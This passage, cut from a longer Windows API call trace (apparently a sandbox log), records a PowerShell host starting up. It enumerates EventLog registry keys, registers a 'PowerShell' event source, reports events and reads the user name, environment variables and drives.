hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x374) returned 0x0 [0068.740] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x378) returned 0x0 [0068.740] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x37c) returned 0x0 [0068.740] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.741] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x380) returned 0x0 [0068.741] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.741] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x384) returned 0x0 [0068.741] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.741] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x388) returned 0x0 [0068.741] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.741] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x38c) returned 0x0 [0068.741] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.741] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x390) returned 0x0 [0068.741] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x394) returned 0x0 [0068.741] RegCloseKey (hKey=0x394) returned 0x0 [0068.742] RegCloseKey (hKey=0x36c) returned 0x0 [0068.742] RegCloseKey (hKey=0x390) returned 0x0 [0068.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1c8 | out: phkResult=0x12d1c8*=0x390) returned 0x0 [0068.742] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.742] CoTaskMemFree (pv=0x0) [0068.742] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.742] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.742] CoTaskMemFree (pv=0x282650) [0068.742] CoTaskMemFree (pv=0x0) [0068.742] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.742] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.742] CoTaskMemFree (pv=0x282650) [0068.742] CoTaskMemFree (pv=0x0) [0068.742] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.742] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.743] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.743] CoTaskMemFree (pv=0x282650) [0068.743] CoTaskMemFree (pv=0x0) [0068.743] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x36c) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.744] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x394) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.744] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x398) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.744] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x39c) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.744] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3a0) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.744] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3a4) returned 0x0 [0068.744] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.745] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3a8) returned 0x0 [0068.745] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.745] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3ac) returned 0x0 [0068.745] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x0) returned 0x2 [0068.745] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3b0) returned 0x0 [0068.745] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x3b4) returned 0x0 [0068.745] RegCloseKey (hKey=0x3b4) returned 0x0 [0068.745] RegCloseKey (hKey=0x390) returned 0x0 [0068.745] RegCloseKey (hKey=0x3b0) returned 0x0 [0068.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x3b0) returned 0x0 [0068.746] RegQueryInfoKeyW (in: hKey=0x3b0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d10c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d108, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d10c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d108*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.746] CoTaskMemFree (pv=0x0) [0068.746] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.746] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x0, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.746] CoTaskMemFree (pv=0x282650) [0068.746] CoTaskMemFree (pv=0x0) [0068.746] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.746] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x1, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.746] CoTaskMemFree (pv=0x282650) [0068.746] CoTaskMemFree (pv=0x0) [0068.746] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.746] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x2, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.746] CoTaskMemFree (pv=0x282650) [0068.746] CoTaskMemFree (pv=0x0) [0068.746] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.746] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x3, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.746] CoTaskMemFree (pv=0x282650) [0068.746] CoTaskMemFree (pv=0x0) [0068.746] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.747] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x4, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.747] CoTaskMemFree (pv=0x282650) [0068.747] CoTaskMemFree (pv=0x0) [0068.747] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.747] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x5, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.747] CoTaskMemFree (pv=0x282650) [0068.747] CoTaskMemFree (pv=0x0) [0068.747] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.747] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x6, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.747] CoTaskMemFree (pv=0x282650) [0068.747] CoTaskMemFree (pv=0x0) [0068.747] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.747] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x7, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.747] CoTaskMemFree (pv=0x282650) [0068.747] CoTaskMemFree (pv=0x0) [0068.747] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.747] RegEnumKeyExW (in: hKey=0x3b0, dwIndex=0x8, lpName=0x282650, lpcchName=0x12d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.747] CoTaskMemFree (pv=0x282650) [0068.747] CoTaskMemFree (pv=0x0) [0068.747] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x390) returned 0x0 [0068.748] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.748] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3b4) returned 0x0 [0068.748] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.748] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3b8) returned 0x0 [0068.748] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.748] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3bc) returned 0x0 [0068.748] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.748] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3c0) returned 0x0 [0068.748] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.749] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3c4) returned 0x0 [0068.749] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.749] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3c8) returned 0x0 [0068.749] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.749] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3cc) returned 0x0 [0068.749] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x0) returned 0x2 [0068.749] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3d0) returned 0x0 [0068.749] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x3d4) returned 0x0 [0068.750] RegCloseKey (hKey=0x3d4) returned 0x0 [0068.750] RegCloseKey (hKey=0x3b0) returned 0x0 [0068.750] RegCloseKey (hKey=0x3d0) returned 0x0 [0068.755] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b930008 [0068.759] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d1d7d0*="WSMan", lpRawData=0x3d1d540) returned 1 [0068.891] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.891] CoTaskMemFree (pv=0x22fde0) [0068.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.894] CoTaskMemAlloc (cb=0x804) returned 0x1b850d30 [0068.894] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b850d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.894] CoTaskMemFree (pv=0x1b850d30) [0068.894] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.895] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.895] CoTaskMemFree (pv=0x282650) [0068.896] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d22d08*="Alias", lpRawData=0x3d22a98) returned 1 [0068.897] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.898] CoTaskMemFree (pv=0x22fde0) [0068.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.900] CoTaskMemAlloc (cb=0x804) returned 0x1b850d30 [0068.900] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b850d30, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.901] CoTaskMemFree (pv=0x1b850d30) [0068.901] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.901] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.901] CoTaskMemFree (pv=0x282650) [0068.902] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d28300*="Environment", lpRawData=0x3d28090) returned 1 [0068.903] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.903] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.903] CoTaskMemFree (pv=0x22fde0) [0068.905] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.905] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0068.905] CoTaskMemFree (pv=0x22fde0) [0068.905] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0068.905] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0068.905] CoTaskMemFree (pv=0x22fde0) [0068.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0068.905] SetErrorMode (uMode=0x1) returned 0x1 [0068.906] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0068.906] SetErrorMode (uMode=0x1) returned 0x1 [0068.907] GetLogicalDrives () returned 0x4 [0068.908] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0068.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.909] SetErrorMode (uMode=0x1) returned 0x1 [0068.911] CoTaskMemAlloc (cb=0x68) returned 0x1b83b3a0 [0068.911] CoTaskMemAlloc 